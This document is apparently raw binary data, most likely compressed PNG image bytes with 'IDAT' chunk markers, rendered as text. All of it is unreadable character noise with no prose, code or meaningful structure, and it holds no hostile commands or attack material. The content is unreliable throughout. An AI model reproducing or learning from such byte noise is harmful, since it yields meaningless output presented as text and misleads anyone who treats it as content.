�m��7:��\*�,�#��t;zҙ�e')Nש�����s��{:ıY����o�sl��t�N���8�(\�?h8s�d"��M-��<�0$�x�j�iM�=���2�*Sxw��������� �A�}����4��-*���P�T�����}^�t�Lf��F˲�'>t/�����w���+�qݒE�b	~�x��Vm�E�����u)•�_8}J9YM�m�:���7����-;�=x����wr�����/f��dg8x��93��i:��R��BiQ>~��{���`\.�a��i�Ɇ-;Y0g:�tU��������̾U��7��j�Tu��hћ����E>��ߦ��g����|��P���
�Z����cm	��/I��P��ϟt%OP%D_�Ku��/��x�w�x�\t������>���qzB�̊I��7��_>C��2���G��=Ίk�h�LL�d�*�BV0@}S3�x�>2�{*Y~�B͝A"�b��
�N.�rb�h<�$��EQ�?�{�T*Mck��ξCɥb/���[�_���0_��O��ǙTU��'�ttu�q;����2)6y�Ec�E���g��Ar8)6iU��ˢ�~�9ލ�*c`n�,�,�.��L��K��3�[u���K�J�v�"KX$�7�p�li�ղ�L2�����%p�Fl(�p�!����dg�}<�н<��}|�����ӻ+�;x���G��?�E�S���NTUcw�a�,�w�Ц٧�]=az"QŎ�n��X=�y9�9μ�oh��u�H&	����;������0?�ߧ
��oψE��Pr�,8m�or�p�[d�yu�h%K�1��q8����h���n���BXe�S��Ca(:l�M���x��n{�/���o老��t&��
[v�i������1}J��!�	%E�AK[5���#��x#?y�}��'M,Eͨ4���XZ�n��i��[w��h]�'��m�~������YŎ�f����]���yjo�ԉדJ��A�s!I����<^x$�/�=���}ﻙU�R6��C��x��WWL�������E�g���l�d�u�Պ�봆���{�yA�ޙz/2-��{�%��2���|s��9�__y����֐���cC~�+YFUin

w1A�Y�#��wr���,�� #Po�?ܥa�\��_���)�`h��Xe�:�oŐTuҪ1fWk�q�+GmV�,��ߊ?�0��5��"�"K�qX�y�QI��t��H�4�M�0OM�,�HvfK � Kro��~�l^�p�6�r���� �{4���xE�@�"6U3�
�_�b����*���GF�q��a0��?&�$!��̘�����d�7C�'�p����u6�Du�	�$I�}�/S�
�Q��b�.1�AF�>_�PF��M�2
� �p�A��a����L=��y9|��q�p
|�54M�'�Y0�]��ɨg=�f�2.7�t:��� �����a���̊,�ṫ�0֘&Ɍ�n\��^��oe��鴵w�]�ѹ��nc��E|�ߧ���Ա}�.��O�����I����,It�D���'�Y�(��x"���"�х���`RQ�<���3o�4���_�Θ:���h�褴��PG'׾�C���� �r�,���@� �5�iO��د�H$R��wR][G:�������VZB�h�6�
���/~��v��4S�'�J���p(v]���kX���.�pJ�3����|�+x<n���S��l�&��Z�D���
�A"�þb�� �O��z��c�JgPU����(v;7,��[�_ʎ=��Ko�:>�H���
��p(
��$�J���ESkM7x�/�������V_�9���O��q�i�A�?�X<���h�즽������UL��u�DR��q�����:������w�ݙ���0V���_�t�>�a�ް�iS��'?|�p4ʟ^|�����ؾ�f#�r�P�_���,�7�bg��JV,^���z�NOO����h>cy�Q;{�n��cρ��Y4g&��.J��	ut]�b
���fػ�����f()*�e�V�;�EQ���U�Ͼ���F��0F�`b�/,
���	��O��C��N��%x��g�	G�<8��_={���O�{���>��7/��W�t:�c����t���f��?~��)��I$R��x}��q^]���H�����]5�A�e*��jm��]Y����i�0?�i�^�66�ߏ����|n]6������^�w�J�hl�<�v���gg���)
�j�H,���C�$��N�V�e+� ��0L:ڎ��j��\i��Ԏ?C9��g��3y���QϾ�U諻'2��ݝ]��q'�eS)���vꀃ�&��b<��?�d��g��(6�D���.v���_|�]G��]/�+�0�e�'�ڌ�����4Ϛ�8���_�����53��f��u�pZ	veɢ�
	M�n�D�䅤��8ڑf���p)����6��ٔ�6D.����_���������n���]R��S_�>x��)�4I$/_o�0�L�Ĵx���w�B�����p��+�I`b��)�*C8�"�G�D�d4��؛nd2):{�U�H$&򰝍��j���"���W���s+��k(�G�F�������'~�}�{f�x�/O��߮a����j�|�|�[��_<��f��PS���r�9(q���\�O�x�˗�V>���+��	%�Z�%��������?PANv�c���30�4�ʚf,@Y��[�аR6��U���0�t&���GHz�����7�;�τ����!:*F3=��v1%�$�����`R��뗨�Ns!G�D<�Komd����21�I��6Z:�L�V�x�[�BO�y�~��.���a(�5�u��>��B�t�	����ﬠ�0���0W]5��=�{�����Awի�:�n�3��q���,q���A�~���fs���E�v�V�^<��C�9ikbF�D{���=����L����p�s&���K��5H�A8C��P\��f��K��a��z\���w���Y((������U�,�+�HR][ϛێR8a"�ң|���)	�!�w%Yyϊٸi����)�%Ѹ�[?�Y�x��E�TL,��D8՛5X4���k��������Xm6d	N��n;���;l2e��2+W�f�V<>6قE�ȤS�n79�>�NG��qL�L���WWM�iD�p6�]��b
�t���g�)�BE�K�|�p�[�h�ݽ�hg��$L/+<u�S<��]{|쁛��沌����"[���>O)+W�C�x�TJ����O�oq��=D~�I��g�D��S����&�Z���W�'8�Z��[D�+[�q�e\A�1�@���7���w�c�5s�U1
�ˆ'������u̜>�h�.�u�ܶtu]�&�D�,R!�]��,�s��E�h6������-�TD8�-]4�x,����S��+��Xvy��]VH���I4��H5Car'������=w�ȱ�� �
�eY�|�޷x�0�m�g��/~��}>z�	����L��+䶼B��{�Ѓ��z�#)9}�i��]�%�7W���:��~���E���-?�DS/�5	�X!�y��.�s�p��Xd,�'��g�w�ZX��>�����'��o+7��p��tV�^϶�i��n���|�,�:��S������������=p�L��Kd)�hVw.Kg�楜7/{�K#•��UY?�Fj�X�i��*�0�����Eg��C�vEaNE�e*��U:q"�yl"�>��W��Hc�x:�k�2k�d>s�e�9��J�e

�j�VV�X��e�%�0��5��'>��k�����W�gǞ�ҧ�f��?��b���3�[����P�]8�M�w�Ɉ	���$[�9]�
�����r�Z8�2����?Y�^��Oax*vJ��
����?JV��#��o}�E�f�q��<\Ç�}�v�c��)D�1~�D���'_��Ϙ?{5u
(�BQ~���t8�ߧ���;<X1�cS��M䌩P��/.����@AaH
z����¹3QU
���w��x��1
M�lܺ��S��4�O}�A̞Aiq!��g�i��r�]�pӊ�<����p�b�K�c��)TLߢ� � �S�@���#��/|�#쭬�S_�tv����`����B�4ZB�8�^]�����lٹUU����܆a�T���Phln���
]7Ȩ�%�c���I���2)tɆK9�O���؅a�Q<.(V���i���t���Nh|�3�̤����<�2`����5|eb���mq�L�x�E�BM�艧Q#Cr�;����v�7.1�~at��0���a���\uy�dIpZ�i�h����!!a�\�I2��IJYq�"�VV���������9x�Y�	|�w�����H���㦣���Wo"�L�zH&SH�L&�a��}���K���23�O�Z�#���ͫ��.b�8h�������f
��������ٳ���4��%��_^a����y�@�G޷���0s*&�|�(/�����{/�~'m��xvg=_�{�꩘2���DZy��\�3"��}{yjS��x���{�;Rɾ�4�h��7�j�O�%���us�.DII��kh�Q4���4�ÓWDI�H\y.b��<P�"a Ɏ��w�c�4I�iDG����+������nf8�N�™$d��|?��[C��z#/������I��.ZC��?��=�
��;{�%�&}�'�d����IQ�\Ͼ��y��ې�'�� ih�:�Ȭl��j��yp�X4�N�i�Ng�^����:���Y0e[������n�\_�lZ�ՕǞm��iO��`=yAg%�Kp�FN����NSW��P�T*���ze%y������qk	�zt::B�(�M]���9�t��8±C�,��'ig�v*���,�5įrt2�H�sL�z�z�[5DO�2�޺{G�醁$�#�Bx��E���{"Q�����	W�l��͛vP4c6�@�rs���eμ(kj8Ng,M")v��*S�k�]��<H5�����':
4MG�{(��w)ttt��G�U�];��߽̫ێ�����x�g���H��{C�,\D~��,�476���H��dLr=vBb�� �P9kG#{���w1.d��&��eq�GgFI�5�ۊI�ʲ|�]8�9�]�+�dU�s�\&��L(?��\�{�S1��ctF5��J�=����H[�L/��~��I�hnl`ʔ��#�Kf�-���ؽz%Onj�[_z袇��&L�@��q"ϞO�⧭��)��2���QC��\�߰�'9�^\�|
rq��+AD8
I�*J�q����͛>��=s�"��le���~�O�p��:�X6��'�[0������N�C�V�Y��d,p�M��n;V�� ���M˃��������r�� �)"�f-���/1�\��h'yA��K�� �	"��$	�EL�AMFΒDa`�{���:R�:��i�A.�A{����&��9V߄i�����`�o�AՍ���_Mo�ʤ��ƠI�j���U�zS�#l��p�%p:n�E-
�0��6�$�h�L���/2./�^]ŷ~�ĩ�~'>����ڙPR���c'�D>����s/���.���]�^�m�{���Yp��iC�"K���9TDǠ C�_\����׾����o�D�����w3�����p�L>��2����}��TL��n�����
ˮ��e�p�M+(-�.�$��_Ƹ�m�@[�
�c-H��%9� �+C��i[�m:�����H���&v��T���f)��C�u��r�{�H��U�f�t8H�R}��f�l����W����6��a�Z��G�g��#�u�<��_�\�iT�S�ݪH���ҵ��[���_s���Ib��sfj�^McJ�i��9c� �������b����E�,�����Ž�R�<u[~p	���T���;�=8���Z�0�Q�dT��5�R>���3+���Z�����O���}�KȒ��i����9F7���%&���u�z�-����BCc偗X<~^1rN�H=O����48��&/f��i����S�͖ô�)������#�Ʀ#!����w� p���ZY��n�i9�z�A��tu���^@{Gx���p$Jsk����4��2c�$���K"���K}s+�?����F#	
�X6�C�I�qRZ���n ����
�8�Ūಹ��/�A��b�ɛĦ��HU�ͤln�6Ä������.ꈤ�	|Y�}F.V�����au
w�F�~`*��}�gl޶���f�'xy�:������v�[{{��m�@ͱ�Z����[�-Ώ$I�I8��4M�D7{WY�^�*zYa�N�WY��e���R��P�j���x�ڞf�z�D:NR?=����g���`�*��Z�
�"�lg�����)�M{�5���ʹ����)yj�/�q�}x�K�BtE+�ݾz$@�e1�h~��Ҁ9"�}u}u���0LU�^�ㅾL�D�M8���U�
¨`���������ϸ$�p��h�'�nf�Iu!!c���5X�$�+�BO���z
���O̻��w>�ow'/���A�](�T��	t�A��4U�ى�@F��j`�TO�)�¨t�'{(�Y�N޷�a<����8`P�=�G�"ژ��%�-{�M*������Hk-h��E���˻F���? ~ď�e?��K��o���~���.�~�Q�?,{��n{7��Vjz��a��q�]�z�	��Ϲ���M�t��:•K�#L_?�]A��q�g�mKc� c\��1��ݘF�5�/�4t6_E,�MĴ�M6׬"e�<�ь�+�Az��:�h��-�a4�N���i��C)�IЭ&z�O�t���I��@sX��/��������~��� 7k&����կО�#I���N܊מ=���~D8BXd	��~��	�pe�
�p<=�����"���:��s�=T����z�K�>NK��2ސ=�hd�O��ќ�q��x�V��|�gɤc�?����q�pU$��w�����f�ez[���q�rߢOR�[���{�lO�7�#�G(���g�d�*n�w�$I(/7;o
52ٔw�ݙ�S�٭r=��\��O�#����1���b�;3
���]�ؘZ4cH�CΙlej���.Ř#���H�,c�P�T���Ǩkk$}jg'���ֳ�1�T�CM�CR��������9%��͛�O�fdb4vw_²����zb�T�mY�zơ�[��]-�z��T4�κ�S���q"��9��J�f�m�����]�M$�ii��Tw�k5
����˄�Yy����:錍��>I���j5� �'�Nr��S�L�e?{��P������<gk7��g\Z���vT��uKYw��g��ŝ[��}�T���Ji�\⪄��7] IDAT9���5\��:vVnD�����q�=��n �m�Mo��N�W�Hg�b���w-�������humu���\;�*r<��e��{�jڇ�ϝ�,����Wv����$�w���b�iѹmR{Z��s���o��
��a܌�p��[x��2#��̓G�e�Ml��]Y�����P][I\KҝNs�շb��Ԇ:���f_[�o��d�N�E��ڙ�I�����W���A����K�Zz'oWnc�������u��{?�㯡���'�Lf8��8���CG��[>B��J^�c�j�s8����?3w�L
|n6ֶ�2:H�&G�J�$
+ZRg��4׬eCU%�,.aǎ�(�"|R��T���'I^ٲ
�đ�CO`�V7�_z=]Ljᦡz
�Q	C�pÒ;	H1�i>p��ܷ���i�4jk��j�f��2�äM�-tZK��3i�e�{���pW�9=�W�wK�b��P;�D�����Ӆn�=��&ili�+,���K�4���a�ڍ�ӷ~�3+wp�~�8�O�P\�BG�z��Ʌy�q�KTL�C�3��wm��p������'z���N\�,l��Siv���Kxu���1ޑ�z|�l�I��䐈4Q�T���hl$�r���$����i�������pC#v��|w~L��w���x��C\�pI";���F�r	x��UUM��I[��{�.	S'�cb��~��ӯ����3k�r���;��:ɓ�P�����]-�l$-EKO��O�h�h%?��n�ݴ���w��d2ܹ�*�ڳ�'���Umd�̛�qd?��a�a��v\6������M��IL/��oⳛlj�::g:͡�'U�t���lܵ]���`�#��Wrռ�h��ܳt	�t��c\U^F[g	�J����P�<,��,[�
���e�
u̘���d�‰�T�X*E[G=�{��kk���79Z�5o���ub���jn��I��ϣm�x��Y�oi�m��Xt�+�p�|x����_^�~���9��_���D�}�Ƿ�����臬�l�s�~�4-���,� QS1~����?ϭ�^�K�=���WO
s��P����q6���U���HR7E�hji�(�?���'M͇9��;�Z�]��{�1k�x,���D���!�q2�۫�Me0L��KE�Mcw�Í���P�F�������N���d��ing��U4��v|�<�x{-I#��C�h�$�:${�(��8�ƕn�o��q
��WW>šX�J
غ�
���L��oP��
'��ro߭i�l=��P8�n�v)v�EƐdp��z��aR��mZ�ԒIH�"I�Kؼ�%
�S�����U�j����&�N"�v��V3�d*m�.9AecӀ���`eقi<����qT0�0�C]:7Ι�U����Y��d�D�����~O�h%���c���S�=�>z��fb�~o��9p*�o�Ƙ��i����z��v��fZ3.Vo~�3q�$�>?o����}�hj9��]�=M{�r�J�{Ie�nc�����a�b��Ȳ�,sj�����Ͻ
H���?��vG)�&��M�ǟy�ܩW����[;Z8�'ۦ1�;��|6��|�
��eK��_�”���K�Bǡ7��+=����<��-�Pa�`]'��u=�����O=ƶ�oВ����y\��A.��k<���X]g�_y���|9����yC�8Y��-D�޵]�DZٮ���~üe%�
-3
^G���IRM�4<ۺ���&eK�a���2N��D��Ӣ�4�|&�6R���5<|�m�]�ɦ��w�^2�K�X�w����T!�ɜ�mҤI�p�?mS
���W��k���H
���}��
M�o9����)��~���z@絗Va���:ҧ�4t]%�1�8m��,��;�b����A{��2��H�w�g8�#�r��|�G�\�F]c�p��Z�����]�+۴iK��8�����p����]��N,�k�p(���
�-
�}~��N���NVV���'N}m5���ȌE�s�>�E&��X���g`d��T�.���Z���ؼa-㲼(6�~7�$a*���XF����EBMu��O����w�i��+��5|7F
Ea=#�����B\vbx�]���kttv��<x:�˜;>��� ��t8�5�_O��W���Ab���=]�(n���&i��r{�򹈆{H�.���Fņ�����\lW�2AC'����e<�|��{�	�q�v^L;�o��n�$�:;S����o8�΀$��Ώ�N{�/ܡ�0��P���|����jZ�	�$	�݆U��'3���d��J�l�i�?��Ɍ*Қ�Y�q+�~A�P�bXa�qڬ8m�y
N����VY��F>b� � �#@AA�1F�� � c�AA�1�u�P5��pr��!�Mg�tU�\=W��ˮ�XEn+a��a���"
� �E��ۇ[�UlV��;U�D(�)bXa���yU&�5"AAcD(� �0ƈ9�� �iK�1"�Ԑ�S���񉹾� \"A8[*���'^�$��.�7���{���� �$��A�C$��d�ه��WQa0�p���h�Wױa�:���d�h�B��Ք��#f�������|�^���ݻX��}�?�=�X��S*fp��S��һ���t���m硏݂��K�
�^gCU�Y��e�\��2�TU�3yJ1�pzA�"�l�X��X�1Vh���t:��8��v���0�Dž�=q�dZ���0��p�ۺ~=���|�bj�)_�%���_�?=zWo��'ؼ� W/�_���s`�s#���3$y|���~CgRミ�O��翼���hwl�7/����z�[<�MNI1-�|���y����'���M�0w��_�y���vzG ��f�w���h�v#&K�{��/��>̳ZE���<|Ǣ�RA8n�q1��<�L���ϳ�!�Usg�ƚ��]�
1�<�P{����ś�絓�������`�
��~!� �1bx�����F���/��h}�<�"-�򕿿�tO��X~u��f4j�R�`9ז���7��,�O�'NgB���{���n�����uˮ�͵U���<v�2v֥�Y�b��zT�>t��h5��l57ܴ����9���`S�m%X8�	9��"&e��L��3./��55(�b�X�a3���z
�;SX$	�C�֥�Sn�?���>r�В�ysq8����� �a�pēXx�-��e��ɗ��7�L@��^UUZ;¤5�����pf:�QV��o��'�$L֭���kg�먷�p擐p!a�۱(6��0hn:���)s��l�8�a���L�5���W��N��F��"��-�L�7�t<�����P��;j`b4X)ʊ+��CsP3Q�^ˬ�	���Z��h�b�A�,�,g�Ua���u���+gk�PG
�c�T���
wqA�D8
��~4-�ݮ�q��c�����f��y'�TR6&����j��V@G�s���$�,<�ɏ�v������,9��-���p1���|>}O�BW���I[��)sf�t�$�R数as%3�O`�
���b�?Ä</^3��p2���/�n�)��%i�#ޔ�ȑʤh
���D�D,�����v#���=��/o9���T�3�:�d���*�l=�g~wp%�>��s���SɎWqw�A���E��p���/<��n�n��eYI����41M�e.�^����`U��KEy�y�H�R4w&�X�uI�&W�7��;Ϭ�$�3���~�~��GXd���t� ��o��ql���v����Ku;?�:�6���M��%VL������ۿB���k>F��;���Jd6�e��!�$�V��T,�t*f��NPS}�L&s�I�&��$�ŒS/豊��"��V;|6���t����?���`d8�v�P,DX;�=�fxX8�D}�U�ҝ���P�
� ���|�s��jڐ�W�$J�Cz�~d���ޏ�v+S���s�p�Eg�g���9$n�v+�%���K[&A��G	�M7�[��nA��lV�'�w1.H&eW�z����L�.`j��|9g�����8m��:RQ43ɑ�Rf���0�D8Jh�Ag,CA@�
�0���~^9�:����fM叛~L]��݇b��2�"Vf,!������li��G��`A],��I_�B�e=xV�|j"�$�]r�$��>x��&Ɍ����h[#�7l"-���M�iIO����U4S&�Md�ꉆ
�j���"Awg��׸��"aԞZ�>'�a�P
���T<I&�bZd�?�2�d�Z�_���A<�Ϳ�&{��Ӊ���J2c�%�ٴ����Ͷ�k�:��X���!#*��$ݡㄓ��0�3q��h��	�AG{�́�"�_ɸ�)t7"��Jǰ+NR�0�X
�ˁ�N�����ͩ��8n;�S:��xJE6Ut]�-�N��	%9�­(8�
����+�]����ñ��I�:i7������{���$U@O�gp9���F��G����
�d�pO�M��;��ջS�T::����H�R)��(�T��۷���%�F�XI%��#	���Ӆ����'~��3.��M��t�h�Fg�aud�
҆�b��ND�
'01�F���
�H'/��7�O��v�ޜN'��bhɔ�jd�a2�����
�})�r�����,_0����L�d"������ �V�%��"��$I�9@ݥTK�lP��!w�08k�����$��T7]�N���L��X;��/�x�
������G�Xӂb�Cad�t��f����U��:��󖳲�D�X�l$IQ�>‘�vf�&����x8|�z��r�s�,����[>�` �-s�!D<���h+8uԴ���H4W2s��4�@eey��Dw�q�u�Dy4��!��ȶt������!#*�r8�dδl:[bdM>�{����)���tG5�x���<��p��0��]Îc�̛D7%<+=�n��䎛�C4a�[k�<����P:���p��}{����bݚ�)?�Xu�t'֭�J����ndۦ-8�`f4��Y��5t� ��6�˂[к�?Z�6e2�N�LG94F�*	��ɞ\Κ7�����e�$��Y�t>V � #����;�Dk��٘`��B�=2�U+�qI���+nPy���S�ضu3ig!�V��5�����LӸfzA9�j��g�V�����S�¶���4Y����@pb>�+s���)���qL���SEŜy�<�8�A<ip�hL�@23tT���̭(����M��"�hM�Gh�н���8�q��m:�uVmj�|�\�_8i�>cK�9|�=�M��6?>�q�L{��/\���)�(a�u$dˮ��=5ܵ�����$�	����=I҆�ϝ!��i�lg˖M$S�b��NS��\�Iq!�iv���핇Ik�@�	�h޼
�^���,R�FOw22����- +7]Ob�8�1	ã$g�*Q�7��Gj��>DeC�˃�"!��m!::;�TC�c�D7kV��@};N�g&CB��J��]]�fƁ��`�+*ضe�]=X^lV8�w+�Mq4Ɋ�Gc&�{��:�	�����.R�N���7m�%��(/�`�CM�H�1
%EE@��-;h�H�[^Ğ��'#���Y��66�_����A�d��s`�Nz)4M#�G��<7m�=I�"%��}��]��dX�b1��l��r�-�&�ƪ��d��S���ѕ��v[�X���S��^Vm�AW�`|~6�X��͍�!MU���z3�d
E���I�̞�'�Hۼ�Sq�M>7�XM�����,���8�Al�V���ĬIv<.���vA�00Y�te�w(
����'ߗ���%۝����b�p	�<��l��f����c��Q�=�C\�)(�'=)9���׸�e��b$��$Rd��X�-�hX$�N�;�X�����W��I������*;pg{H���w�2& K. c�%B�^��l��R�d�IEu��<�65�̓�fI����wxi~�oU�
����!g�����M��Yi�֖�;�l�N��|�$���<��m�砵��jז6φɁ9
	9�Fw�s�9$��8���y0VU�������o���-�r�(�T�&��=2�'��G�Qd-�����aT���B!�'���x�;é�Q~�|�d4D*WƄ���$��C)MQ2R�sQHEX.�)�x&J�4�t�ӉNɢ1�)�"$R0��Zu�)��%��B*�Fc�b����Qt�J�DN%6;H����/H�rh�NB�<s�_��ϒ��Q�<fK�Uf)����$�IPRT�Z
*`��(#�l�N��l�(�4RI�x-D"P2�חHd˸�J�<˩4V��B":+����
�(�)(
��EICmu%��E�e�t�i�F�tF���X�%�f���V##�s4�0�G�8<~�n�	�TD��n�}AX�zy�S.��ӷ]��u؍6�<Zz��<��z�yE��>��^LNOS[S�~�aSKLOƨ������/��U����9=z�h�AWk�ZWE�y�p3
�H-����upH��ں@eVOM�&�ٙ�[(�<á%ڪ�k]A�@���\<D^�p��E�=��Td�Ft8��O<[�g(f��~�����b1�'�]�
c���4n�:s���oo��Ləs��]4yu
9�|��a��շl�OE�MAc���fH:�m�@�T�+�W����{�)�'��5�����K�B�~�5��T�)|-���)$و���[+r�]�b�t�B���9ݱ��S���ŝ�p!<B��;,��o{<���������Oszb�'7�eK�j�)Y&�����P<��j`9��n������Z�R�"
N��������M[b!���5�SK�)f�9�z�h4(��l&��ꡜK�S� �1Y}K%�#3�yT��Z�
=9b�"n����AS��t9X/`�x(R�U��S�g��Ӡ S�	���
J>
�^gDigh)�L����d�O�8zG�
5��j8t�)f��؅���q���hy�j�2ʵ����Qt�Y��y��d�Ü>s���"n_���T\s?��B=[��@?2��D!}�X��3��8{��X���<An���,,�3����j6����{�5b�tb��H��p���~�+�s���[�P�e/��_%��CY<E���ٳ�&�����9��"@�1��2.M������N�޶�xx�~?����d��
�w��y����C[�8��j�r?._#��<���j�ʼn���~�##�tn�����{n�Gώ����\>w�b��T��>�IJ���f}����?Hr9���g�U�A6F���X����&�*�8$
ǎ��}�N������̎F�Μ���klv��2��\/���r2�URh��r~h��M-�)/��8$�sc?����{)i4Xt����>�>�܆?<�6����x�fO�ە��'���Nh�$ٹ�{��ŢTM*6��H���=����=�#3\�_$�4��;�<E����E��<���r�5F�F��.6W��.\e�\I{m�j'?<u���j΍Q�')��k29�/kƴ0KGW5�G�ȥu�-Z�6SV�e~p�65n��� �1
�a�W���n�f+m�4=�=p��^&f�ģ�2J�"&��r�L[G-A����29r�z�a%Ϙ���C�,*Rq�T<D:�D4S�uC'�m-�e@%�)��tY4�,��޹����L���,�L<#�����*���l����s7jn��o���pqb���&y�S�c3i1h,�^>Kw�n<v+&M�s#�z�.'Y�3?WB)fPn��7Yy�g�p��̄���.�Q,��ކ��AM'��@�݅Aɱ00����Y��֩�4n�Bs�
��-;`��H�� IDAT<��%22p��-�:
�>����k?[:�ص��BNE��p��2��g�&�h�zv�{���$:���\?gzS<s�I,�g��<�t�H��)l?9�ٻs�{�,��I�������7O�qh�.J�K��,.�P�BW.^?_�W��?��}�װ�:��[is�f�7���r1b�<Hj��k��U�a�b_�^l&+�^?��F��+9
$4T��h$��
����q;�ȧ�(Hhd
]�02t��g�+��h���&�i`�����+{�����$yT4�:x|���u�E�5�HZ:�u�bb~�tQ���-�������ĵ���*�4��l�ފ\�S�:�X�(�*��q�67���fli���>Q_6��� a����f�5u ��
O�R׈�g�9>��1�����Z=E��s��,>�����9\�*~���D�v,�Kf��.��ش	ux���.r�M�8s���],�:7��7��$��:3MU^d����Mն62[�H�T�����Hf+�O���/�B�j����U4�NF1�T6t!�\�L,�{�q���T��Ǘ�bW['��}H�
t2�,6��0����Mw=�S�"խ�j\�?OCK;��%��lj�pq0���@�d���C!����x;7�
O��ރ�l���g�7l��3H)�f[n��M�$�)�*-Z�F&v@k%�˦��х�…٢��=}�ލ۱F�ܔKE6l�H�?��K0�*��ZGAk#�0O�ٰv�pߜ��6�q6ѝ-c���l�ڀI*�ս�ȗ���`Л��n�D�Y����-��:��Ln��U�\�E,z�eV���)tj	���/���c1�ESl������2y�:���9�2�Գ�
�tNtz�RU���zW3_
�()Z�>"!L&J�MS�FF�L�좩~#�|�� �H��>)��?n��G�:B��Cli�u0G6��dp`�}�������6�QQ���<��_�k�$�m�,���v�(�����i��Η�`��(���,��4[�[?��o&�$S��v�eG��$7u��I��ɔ���^�%F�H�X�PQW�����A�
������F(����,!�?AV�1�M2�Q#�
� �Swj��jtK�;o �L�0��ǡ�~��[[�58�NJ������t"AX�T��f��;�a���Y�Z
UUU�,�A�I�,�Qv�	���	D�:��P(��� \ &��}O�G�$I�ZU>l(ZA֩�y$�C������ �p�X�+��a�JJ���� ka5�"AX�$I����3yTUEQT��{�CW�a���~��X�A���?�*��E(��N��J��µ���R�2(��<ue,�*�"�ד�"AX��k��U���"!	�Z8�Q�w�P�>$39���9�쪖+I���`S����שⱯ <lV���N�� ����)���Rv$���s굪�ᡵ�VW��D�PI�bLχId���F�+���6)�J��:A-���&�s^�.�K�(��n�S,H����"�*ـ�v�d�wR.�Hd
��+�OĖɫ:|.�=����К�u�e)R�2�H��*�8�jD#am�n���f�P.��?Z��bI���\ox�q�z�
A�=�Z��Un��:w����o�����
��T|���|��_��Ov"K����������3s|�߼���?�p��Ko�ʹ��P"��~a7���Gߠ������}�T|i�?�Y��<Eh�<��Ob��<��_��&�=���U�~�C-��ˊ����~�M����/��u}���T�{��=����p���8L|r�?��S�ꀟp8D�t�f&(
Mut�U.L&��>ԾeI�b�](����Or��bI�|��
���2c�\SS_��������	����c�x�2�(p��א=����6�-�9}�4�>���x��KW9����N�<�/p��G8V���
��=�©)�|/�8=ͯ���,'2d�)T���>��)���b!��~��o��y,����l-�M�roGu�e�Y��LF1�{������,+&~�k��+��[�4j��
����%<a?���\���~��lk	��i�mk$��k�Z����8�7���H�$g��l�34��ǻ9zj�ICR���0.�>ԞUUE�%�.� �F"_�he�;�:��㔗&(Z����P�ұ���+���o��N����0��[��\T���gc�-댮J~��>��P/#j#��=�ۢL<�î/�N_�R���/?���o��w&Q$=2E��4�
]<�n`��>G"Ac0���X��DS�榙[.���D��v��J*��U�afp�栝�}]$
V�����G=��pO�F#�����^�#.0jWn����Dhp:1��xL*#�,mA?U^+^�����"��	£죾�E���a��T�?�W����{��U�������E��{��;p٬���Q�R`�[q;mT��\����9�mV\v^�
�ހ3�L�f��;r�Ɍ����7{��%&g��n����x��|��T�N"���<N�F3>��ˉŨ��R���O_������O}��ƆJ�n�D�ˊ$kp�Y��o���O�"7�f2�񚩮2x���
�N̘"|<���ן�A���g7���C�&"�8s�$�Y�%Т���/g(S"W�G�,D3��_
�#I��
���{���5�ҏ��Q�E���eY~/��J���N˝cyFgiim��y_��D8��j�P���d���f"�I�:-��YJ��FFS. K2yUBQT�f=�r�����[WS�����l��Ȗ�l6A1K�� i� I׃�d<F�$�s[�FbHZ-F�L�$����d%��q�g��ojB-dКl��)�%	�ێ��QT�ǁZ.K�Рb5���4*�2X�&,&��:e�#�S���߼
��h��ʎ���r��Lh�܇����O���[�/%2hd��䯊�"K.����͗��H�|���ZBRo�'�p��V(������_} e�k��*�
ym�w[V3%� <�T��r�����_��_��@�a�b�ݲi6_$�+�������G�� �����մ��J�DOGݽoϝ��ͷ���d�}KK\8{�|��r���{�y�ɷ_�i�|:Ņ��L]��{�� w�X�������2�|����?�ޱ�n�-wb� �}������ZW�s����qrE�T�7
e��V���?�_��C�"��౭��y��@-����|������e~vv�����d��[\��R��?|�-����^�p�䛼3f��齌��f��Y�z��e��|�i<V�C��b�T,�й���=�o��IS��ӧ�Fۻh|H�
��G�L.��GUIg
L
1S��൰�{�o�~��~�[���U�� �-S�5��ވ���!���mu�Ӄ|��fg��:+�M-h�!&'���o���
N����}�^�.��L�(o��2�K?\WHAx$�Si�Si�\�_��o1�(qqh���O�	U�:��e�B��
�ۯ�A!����5�P*�z�J��3�� ���V%�L^�Cd��Y�"ˑ$�l�H�۔�%��6��r(B:��T*���M�)��~\nW�d2Ii��%����r����K}�t���J7��Ǡ�Պ�j��g>E[��C;Z9y�
t&�HE���g�z�o��xg$��!191A"���3�e$�	�Cbjz�J��ވ��@-ei�:�ny��CKk}(aݰ��ÿ�_�[Ñw&��_�U~�lb�[�A ��J`���m���E�_Mt1G[�DTqPm���P��
;&w�Tx�弁f�cSCl޾�I�;'N0?7��}��?4�O��Ȕ��v�F?=������W�8���aꪢ�����0r�@Sg���ع{7�L�T"�ס!��e,�:&�$y�Wv1r�,�����թ�� E�v��QJ�i�C�q��ݍV-p��q�7��c��#�5^J�-,��hR��x���$O<�+XB/3f�4]�E��T׵Br���<��`0��LǙ_�U����9�{~s�W^*���έԫJ�Bv7�X�~@W��(�� �������]%�S�؜ȥ���I�gq�+��ϑQ��W{����hs�0�X��hm�!47��@V
,%��s�,�
5�NMaw{�댨���u�A��	�^+��J1!�UhljĤ��p?r��1Z���)��j}�Z�Ѿi��C�]�f-��*�������]�f+�~D`��g	Z5������a�����TV��hH��r㯓�^�Ĺi\;(&�tnal>��ש��,azs
;j]�C!4R�K'�0�1�wG
�C)67V^�q���~~W&{��2�m{h��HEbD����L4�̡ ��E�&��
^~�g��_�d�b���1?q�K�FL�X�Vj+��Y��qRr����Y�|���1X$���^Y����+��|���/��ٳ���mqq��(����y�w4D�+B��^�S-4�v�v������z}ن
�M���T�^[���l<�*�ݾ��ח��+S1�,��A�#�
��2��lh~�S���f��L"�D���i��2:A��`s8�:��K
�X�Y<f�`��K��a�0��\<��r��G�\��5����3'YL�(*Fg#ͻ#7p���K�*��ldi�
��!\�I*c5���1aԽ���J)�alf�E���M.1N`4˜?y�����"��^F�3Q�%8��1�s+�c-V��NF��	����V�I&��7���s���j��E@�񷎰\�q���D�9UF�Kq�\���Z*1��ay��x� wd)� ����8�S=^{��=�~������ O>۽��
\���$���E��q���Ax��G�ªylϮ��h��~�}Ջ
